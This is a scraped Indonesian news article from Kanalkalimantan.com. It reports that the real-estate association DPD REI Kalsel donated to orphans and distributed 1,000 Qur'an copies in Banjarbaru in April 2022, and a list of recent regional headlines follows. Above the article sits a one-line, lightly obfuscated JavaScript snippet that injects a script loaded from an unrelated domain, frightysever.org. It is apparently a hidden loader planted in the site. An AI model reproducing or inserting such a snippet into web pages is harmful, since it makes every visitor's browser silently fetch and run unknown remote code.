(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Ragam

DPD REI Kalsel Bagikan 1.000 Mushaf Al Qur’an


KANALKALIMANTAN.COM, BANJARBARU – DPD REI Kalimantan Selatan (Kalsel) menggelar silaturahmi dengan kaum dhuafa dan anak yatim piatu. Acara dihadiri Wali Kota Banjarbaru Aditya Mufti Ariffin di Ballroom Hotel Novotel Banjarbaru, Rabu (13/4/2022) petang.

Hadir bersama Wali Kota anak-anak yatim dari sejumlah panti asuhan, Ketua DPD REI Kalsel H Ahyat Sarbini, Ustadz Ilham Humaidi, Keluarga Besar DPD REI Kalsel dan mitra kerja DPD REI.

Wali Kota Banjarbaru Aditya Mufti Ariffin didampingi Ketua DPD REI Kalsel berkesempatyan menyerahkan CSR santunan untuk anak yatim piatu dari DPD REI Kalsel.

DPD REI Kalsel juga berdonasi pada kaum duafa dan berbagi 1.000 mushaf Al Qur’an untuk santri penghapal Al Qur’an di Rumah Tahfiz dan pondok pesantren.

 

 

Baca juga: Mantan Plt Kadis PUPR HSU Divonis 6 Tahun, Kuasa Hukum Sebut Putusan Hakim Diluar Tuntutan Jaksa

Ketua Panitia, Bledug Anggoro ST MM mengatakan, pada Ramadhan kali ini DPD REI Kalsel berbagi 1.000 mushaf Al Qur’an untuk santri penghapal Al Qur’an di Rumah Tahfiz dan pondok pesantren yang tersebar di 13 kabupaten/kota.

Wali Kota Banjarbaru Aditya Mufti Ariffin. Foto: medcenbjb

Wali Kota Banjarbaru mengatakan, ada beberapa hal yang patut kita syukuri yang pertama adalah dimana Covid-19 melandai, khususnya di Banjarbaru sudah tidak ada kasus aktif dan pada ulang tahun ke-23 Kota Banjarbaru. “Kota kita mendapat kabar bahwa Banjarbaru telah ditetapkan menjadi Ibu Kota Provinsi Kalimantan Selatan,” ujarnya.

Sementara itu, Ketua DPD REI Kalsel H Ahyat Sarbini menyampaikan ucapan terima kasih kepada yang sudah bisa hadir pada hari ini, khususnya Ustadz Ilham Humaidi, Keluarga Besar DPD REI Kalsel dan anak-anak yatim piatu. (Kanalkalimantan.com/al)

Reporter : al
Editor : kk


Risa

Recent Posts

Pemkab Kapuas Salurkan Bantuan Kemanusiaan Lewat APKASI

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten Kapuas menyalurkan bantuan kemanusiaan bagi masyarakat terdampak bencana banjir… Read More

4 jam ago

New CRETA Alpha Resmi Mengaspal, Hyundai Tawarkan Value Kompetitif

KANALKALIMANTAN.COM, JAKARTA — PT Hyundai Motors Indonesia (HMID) memulai gebrakan di awal tahun dengan meluncurkan… Read More

7 jam ago

Pemkab Banjar Buka Call Center untuk Koordinasi Lintas Sektor Penanganan Banjir

KANALKALIMANTAN.COM, MARTAPURA - Dinas Sosial Pemberdayaan Perempuan, Perlindungan Anak, Pengendalian Penduduk dan Keluarga Berencana (Dinsos… Read More

12 jam ago

Gubernur Muhidin Melantik 11 Pejabat, Ini Nama-namanya

KANALKALIMANTAN.COM, BANJARBARU – Gubernur Kalimantan Selatan H Muhidin melantik 11 pejabat pimpinan tinggi pratama lingkup… Read More

14 jam ago

Hadiri Rapat Paripurna, Wabup Dodo : Sinergi DPRD dengan Pemerintah Daerah

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati Kapuas, Dodo menghadiri Rapat Paripurna Ke-10 Masa Persidangan III… Read More

16 jam ago

Tidur Bertahan Hidup di Atas Apar-Apar, Banjir Kabupaten Banjar Meluas

KANALKALIMANTAN.COM, MARTAPURA – Selama sepekan lebih, warga Desa Sungaitabuk Keramat, Kecamatan Sungai Tabuk, Kabupaten Banjar,… Read More

17 jam ago

This website uses cookies.